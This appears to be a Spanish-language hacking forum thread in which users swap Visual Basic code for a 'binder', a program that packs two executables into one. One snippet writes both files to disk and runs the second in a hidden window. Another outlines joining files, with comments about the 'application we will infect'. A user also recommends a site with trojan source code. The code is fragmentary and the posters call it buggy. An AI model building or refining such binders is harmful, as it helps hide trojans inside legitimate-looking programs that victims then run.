Autor
|
Tema: binder en vb (Leído 6,747 veces)
|
loco5
|
hola he encontrado este codigo de vb q permite juntar dos fichero.
public sub Main() dim Ressource() as byte dim path as string dim path1 as string
path = (App.path & "\fichier1.exe") 'path du fichier1 Ressource = LoadResData(101, "CUSTOM") 'on charge la ressource du fichier1
Open path For Binary As #1 Put #1, , Ressource 'on ecrit l'exe fichier1 Close #1
'même chose pour fichier 2 path1 = (App.path & "\fichier2.exe") Ressource = LoadResData(102, "CUSTOM")
Open path1 For Binary As #1 Put #1, , Ressource Close #1
shell path1, Vbnormal shell path, vbHide
End sub
mi pregunta como puedo meter los recuros es decir los programas q van a ejecutar
|
|
|
|
|
|
|
NYlOn
OOOOHHHHHH, TARAGÜIIII xDDDDDD
|
ese code solo permite ejecutar 2 arcihvos diferentes, no juntarlos... y tiene varios errores :S
|
|
|
|
|
|
|
loco5
|
ejecuta lo dos si pero tienen q estar dentro de un solo fichero es el principio de un binder , no me sale errores
|
|
|
|
|
|
|
NYlOn
OOOOHHHHHH, TARAGÜIIII xDDDDDD
|
Ressource = LoadResData(101, "CUSTOM") 'on charge la ressource du fichier1
Error: Resource with identifier '101' not found si saco esa linea solo me ejecuta los 2 archivos x separados, no me los junta en ningun lado..
|
|
|
|
|
|
|
-sagitari-
:D
|
ese code cojea bastante..... mira, en www.lover-ice.comahi tienes codes fuente para VB de troyanos, binders, programas para msn y demas cosillas, saludos, no pretendo hacer spam, porq no conozco al webmaster d esa web ni nada, solo pretendo ayudaar dw
|
|
|
|
|
|
|
_Sergi_
|
No creo que nadie se piense q sea spam Gracias GreenDeviL
|
|
|
|
Proyecto de Ingeniero
|
|
|
programatrix
|
'esto sería un especie de blinder (por lo menos las bases) dfichero1 = Space(LOF(1)) dfichero2 = Space(LOF(1)) dfichero3 = Space(LOF(1)) Open fichero1 For Binary Access Read As #1 'sacamos la aplicación que infectaremos Get #1, , dfichero1 'leemos los contenidos Close #1 Open fichero2 For Binary Access Read As #2 'sacamos la aplicación que infectaremos Get #2, , dfichero2 'leemos el otro Close #2 Open truco For Binary Access Read As #3 'sacamos la aplicación que infectaremos Get #3, , dfichero3 'leemos el programa base Close #3 'el fichero3 devería de llevar los codes para sacar a su vez las dos aplicaciones 'y permitir su ejecución Open rutae For Binary Access Write As #4 'la ruta donde creamos la nueva aplicación Put #4, , dfichero3 'metemos el programa que ejecutará a su vez a estos dos Put #4, , dfichero1 'metemos el fichero que será ejecutado en primer lugar Put #4, , dfichero2 'metemos el fichero que será ejecutado en segundo lugar Close #4 'cerramos 'Faltan muchas cosas como por ejemplo indicarle a programa que leemos en primer 'lugar el peso de cada fichero y por adonde tiene que cortar para ejecutar cada uno por separado 'Pero esto es solo una base que hos puede ser util 'Saludos xD
|
|
|
|
|
|
|
|
-sagitari-
:D
|
No creo que nadie se piense q sea spam Gracias GreenDeviL De nada p.d ahora probare ese code reydelmundo11
|
|
|
|
|
|
|
programatrix
|
No se que vas a provar es solo un esquema de un programa seguro que ni te funcionará
|
|
|
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |